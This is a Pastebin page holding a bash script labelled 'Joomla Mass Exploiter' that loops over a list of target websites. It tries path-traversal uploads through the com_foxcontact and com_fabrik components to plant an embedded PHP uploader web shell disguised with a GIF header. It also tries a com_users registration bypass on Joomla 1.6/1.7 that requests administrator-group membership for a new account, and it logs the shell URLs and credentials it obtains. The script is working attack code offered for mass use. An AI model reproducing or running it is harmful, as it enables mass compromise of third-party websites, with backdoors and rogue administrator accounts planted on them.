SHARE
TWEET

Joomla Mass Exploiter

a guest Dec 23rd, 2017 22 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # http://blog.zerobyte.id/
  3.  
  4. ## EDIT HERE ##
  5. shell_log="webshell.txt";
  6. email="zombieroot13@gmail.com";
  7. username="schopath";
  8. password="123456";
  9. ## EOF ##
  10.  
  11.  
  12. shell='GIF89a;'$(echo -ne '\n\r\n')'<title>ZeroByte.ID</title>'$(echo -ne '\n\r\n')'<pre><b>ZeroByte.ID Uploader</b></pre>'$(echo -ne '\n\r\n')'<?php $files = @$_FILES["files"];if ($files["name"] != "") {$fullpath = $_REQUEST["path"] . $files["name"];if (move_uploaded_file($files["tmp_name"], $fullpath)){echo "<a href=\"$fullpath\">Done! click here.</a>";}}?><form method=POST enctype="multipart/form-data" action="">'$(echo -ne '\n\r\n')'<input type=text name=path><input type="file" name="files">'$(echo -ne '\n\r\n')'<br><input type=submit value="Upload">'$(echo -ne '\n\r\n')'</form>';
  13. function foxcontact(){
  14.     victim=$1;
  15.     rand=$(shuf -i 10000-99999 -n 1);
  16.     filename="shell_"$rand".php";
  17.     mids=$(timeout 10 curl -X POST $victim -s | grep '<a name=\"mid_' | sed 's|<a name="mid_||g' | sed 's|"></a>||g');
  18.     cids=$(timeout 10 curl -X POST $victim -s | grep '<a name=\"cid_' | sed 's|<a name="cid_||g' | sed 's|"></a>||g');
  19.     webshell=$victim"/components/com_foxcontact/"$filename;
  20.     if [[ ! -z "$mids" ]];then
  21.         mid=$mids;
  22.         cid=0;
  23.     elif [[ ! -z "$cids" ]];then
  24.         mid=0;
  25.         cid=$cids;
  26.     else
  27.         echo '[BAD] Com_Foxcontact CID & MID are empty.';
  28.         return 1;
  29.     fi
  30.  
  31.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/components/com_foxcontact/lib/file-uploader.php?cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  32.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  33.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  34.         echo $webshell >> $shell_log;
  35.         return 1;
  36.     else
  37.         echo -ne '';
  38.     fi
  39.  
  40.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id="${cid}"&cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  41.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  42.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  43.         echo $webshell >> $shell_log
  44.         return 1;
  45.     else
  46.         echo -ne '';
  47.     fi
  48.  
  49.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id="${cid}"&cid="${cid}"&mid="${mid}"&owner=module&id="${cid}"&qqfile=/../../"$filename;
  50.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  51.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  52.         echo $webshell >> $shell_log
  53.         return 1;
  54.     else
  55.         echo -ne '';
  56.     fi
  57.  
  58.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/components/com_foxcontact/lib/uploader.php?cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  59.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  60.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  61.         echo $webshell >> $shell_log
  62.         return 1;
  63.     else
  64.         echo -ne '';
  65.     fi
  66.     echo '[BAD] Com_Foxcontact Not Vulnerable.';
  67. }
  68.  
  69.  
  70. function fabrik(){
  71.     victim=$1;
  72.     shuf -i 1000-9999 -n 1 > namerand.tmp
  73.     filename='cache_'$(cat namerand.tmp)'.php';
  74.     echo $shell > $filename;
  75.     exploit=$(timeout 10 curl -s -F "file=@"$filename $victim"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload");
  76.  
  77.         if [[ $exploit =~ $filename ]]; then
  78.             echo '[OK] Shell: '$domain'/'$filename;
  79.             echo $domain'/'$filename >> $shell_log;
  80.         else
  81.             echo '[BAD] Com_Fabrik Not Vulnerable.';
  82.         fi
  83.  
  84.     rm -f $filename;
  85.     rm -f namerand.tmp;
  86. }
  87.  
  88.  
  89. function comusers(){
  90.     victim=$1;
  91.     if [[ $(timeout 5 curl -s $victim'/administrator/') =~ 'Joomla! 1.7 - Open Source Content Management' ]] || [[ $(timeout 5 curl -s $victim'/index.php') =~ 'Joomla! 1.7 - Open Source Content Management' ]]; then
  92.         echo -ne '';
  93.     elif [[ $(timeout 5 curl -s $victim'/administrator/') =~ 'Joomla! 1.6 - Open Source Content Management' ]] || [[ $(timeout 5 curl -s $victim'/index.php') =~ 'Joomla! 1.6 - Open Source Content Management' ]]; then
  94.         echo -ne '';
  95.     else
  96.         echo '[BAD] Com_Users Not Vulnerable.'
  97.         return 1;
  98.     fi
  99.  
  100.     # GET HIDDEN VALUE
  101.     timeout 10 curl -s --cookie-jar cookie_com_users.tmp $victim"/index.php?option=com_users&view=registration" | grep -A 2 '<input type="hidden" name="task" value="registration.register"' | grep '" value="1"' | sed 's|" value="1"|\n|g' | head -1 | sed 's|<input type="hidden" name="|\ntoked: |g' | grep 'toked:' | awk '{print $2}' > token_com_users.txt;
  102.     token=$(cat token_com_users.txt);
  103.     if [[ -z $token ]];then
  104.         echo '[BAD] Com_Users cannot get token.'
  105.         return 1
  106.     else
  107.         echo -ne '';
  108.     fi
  109.     timeout 10 curl -s -L -b cookie_com_users.tmp -d "jform[name]=ZerobyteID Exploiter" -d "jform[username]="$username -d "jform[password1]=12345678" -d "jform[password2]=kkk0ntol" -d "jform[email1]="$email -d "jform[email2]="$email -d "jform[groups][]=7" -d "option=com_users" -d "task=registration.register" -d $(cat token_com_users.txt)"=1" $victim"/index.php?option=com_users&view=registration" > 1.txt;
  110.     if [[ $(cat 1.txt) =~ $email ]];then
  111.         echo -ne '';
  112.     else
  113.         echo '[BAD] Com_Users cannot find web-form.';
  114.         return 1
  115.     fi
  116.     timeout 10 curl -s -L -b cookie_com_users.tmp -d "jform[name]=ZerobyteID Exploiter" -d "jform[username]="$username -d "jform[password1]="$password -d "jform[password2]="$password -d "jform[email1]="$email -d "jform[email2]="$email -d "option=com_users" -d "task=registration.register" -d $(cat token_com_users.txt)"=1" $victim"/index.php?option=com_users&view=registration" > 2.txt;
  117.     if [[ $(cat 2.txt) =~ 'jform[password1]' ]];then
  118.         echo '[BAD] Com_Users failed exploitation.'
  119.     else
  120.         echo '[OK] Com_Users Exploited with ['$username':'$password'], open your email for verification.';
  121.         echo $victim'/administrator/ (user: '$username' | password: '$password')';
  122.         return 1
  123.     fi
  124. }
  125.  
  126. cat << "CREDIT"
  127.  _____              _           _         _     _
  128. |__  /___ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  129.   / // _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  130.  / /|  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  131. /____\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  132.                           |___/                  
  133. ----------- Schopath [at] Zerobyte.id -----------
  134. ----------- Joomla Mass Exploiter V.1 -----------
  135. -------------------------------------------------
  136.  
  137. CREDIT
  138.  
  139. list=$1;
  140. $(cat $list | wc -l)
  141. for target in $(cat $list); do
  142.     echo '' > cookie_com_users.tmp;echo '' > 1.txt;echo '' > 2.txt;
  143.     echo '[+] Try: '$target;
  144.     foxcontact $target
  145.     fabrik $target
  146.     comusers $target
  147.     echo '';
  148.     rm -f cookie_com_users.tmp
  149.     rm -f 1.txt
  150.     rm -f 2.txt
  151. done
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top